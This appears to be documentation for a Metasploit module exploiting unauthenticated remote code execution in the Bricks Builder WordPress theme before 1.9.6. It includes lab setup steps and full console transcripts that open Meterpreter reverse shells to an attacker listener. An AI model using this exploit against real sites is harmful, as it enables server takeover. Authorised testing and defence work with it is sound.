## Vulnerable Application This Metasploit module exploits a Remote Code Execution vulnerability in Bricks Builder Theme, versions prior to 1.9.6. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval() function usage within the theme. To replicate a vulnerable environment for testing: 1. Install WordPress. 2. Download and install the Bricks Builder Theme, ensuring the version is below 1.9.6. 3. Activate Bricks Builder. 4. Create a model with a default page (to ensure the nonce is on index.php, add some elements). ## Verification Steps 1. Set up a WordPress instance with the Bricks Builder Theme (version < 1.9.6). 2. Launch `msfconsole` in your Metasploit framework. 3. Use the module: `use exploit/multi/http/wp_bricks_builder_rce`. 4. Set `RHOSTS` to the local IP address or hostname of the target. 5. Configure necessary options such as `TARGETURI`, `SSL`, and `RPORT`. 6. Execute the exploit using the `run` or `exploit` command. 7. If the target is vulnerable, the module will execute the specified payload. ## Options No option ## Scenarios ### Successful Exploitation Against Local WordPress with Bricks Builder Theme 1.8 **Setup**: - Local WordPress instance with Bricks Builder Theme version 1.8. - Metasploit Framework. **Steps**: 1. Start `msfconsole`. 2. Load the module: ``` use exploit/multi/http/wp_bricks_builder_rce ``` 4. Set `RHOSTS` to the local IP (e.g., 192.168.1.10). 5. Configure other necessary options (TARGETURI, SSL, etc.). 6. Launch the exploit: ``` exploit ``` **Expected Results**: - The module attempts to retrieve a nonce from the local server. - It then uploads and executes the payload. - If successful, control over the local WordPress instance is gained, depending on the payload used. **Example**: With `cmd/linux/http/x64/meterpreter/reverse_tcp`: ``` msf6 > search bricks Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/wp_bricks_builder_rce 2024-02-19 excellent Yes Unauthenticated RCE in Bricks Builder Theme Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/wp_bricks_builder_rce msf6 > use 0 [*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp msf6 exploit(multi/http/wp_bricks_builder_rce) > options Module options (exploit/multi/http/wp_bricks_builder_rce): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit. html RPORT 443 yes The target port (TCP) SSL true no Negotiate SSL/TLS for outgoing connections TARGETURI / yes The URI path to WordPress VHOST no HTTP server virtual host Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) FETCH_DELETE false yes Attempt to delete the binary after execution FETCH_FILENAME ilPaBylkCKr no Name to use on remote system when storing payload; cannot contain spaces or slashes FETCH_SRVHOST no Local IP to use for serving payload FETCH_SRVPORT 8080 yes Local port to use for serving payload FETCH_URIPATH no Local URI to use for serving payload FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces LHOST 192.168.1.5 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic View the full module info with the info, or info -d command. msf6 exploit(multi/http/wp_bricks_builder_rce) > set ssl false [!] Changing the SSL option's value may require changing RPORT! ssl => false msf6 exploit(multi/http/wp_bricks_builder_rce) > set rhosts localhost rhosts => localhost msf6 exploit(multi/http/wp_bricks_builder_rce) > set rport 8888 rport => 8888 msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit [*] Started reverse TCP handler on 192.168.1.5:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [+] Nonce retrieved: 953563d296 [*] Sending stage (3045380 bytes) to 172.20.0.2 [*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.20.0.2:39856) at 2024-02-26 21:51:11 +0100 meterpreter > sysinfo Computer : 172.20.0.2 OS : Debian 11.8 (Linux 6.4.10-060410-generic) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > ``` With `php/meterpreter/reverse_tcp`: ``` msf6 exploit(multi/http/wp_bricks_builder_rce) > set payload php/meterpreter/reverse_tcp payload => php/meterpreter/reverse_tcp msf6 exploit(multi/http/wp_bricks_builder_rce) > exploit [*] Started reverse TCP handler on 192.168.1.5:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. [+] Nonce retrieved: 953563d296 [*] Sending stage (39927 bytes) to 172.20.0.2 [*] Meterpreter session 2 opened (192.168.1.5:4444 -> 172.20.0.2:49678) at 2024-02-26 22:02:56 +0100 meterpreter > sysinfo Computer : 65e1e703e433 OS : Linux 65e1e703e433 6.4.10-060410-generic #202308111154 SMP PREEMPT_DYNAMIC Fri Aug 11 12:00:45 UTC 2023 x86_64 Meterpreter : php/linux meterpreter > ```